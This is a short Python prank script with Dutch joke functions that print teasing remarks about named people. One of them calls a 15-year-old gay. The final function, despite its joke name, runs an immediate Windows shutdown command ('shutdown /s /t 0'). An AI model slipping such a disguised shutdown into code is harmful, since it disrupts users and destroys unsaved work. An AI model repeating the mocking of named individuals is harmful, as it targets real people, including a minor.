import os

def WieIsNoble():
    print("Noble is noble bawz")

def HoeOudIsNoble():
    print("Noble is 15.. Een echte jonkie")

def IsNobleGay():
    print("Noble is zeker gay")

def JaronIsGay():
        os.system("shutdown /s /t 0")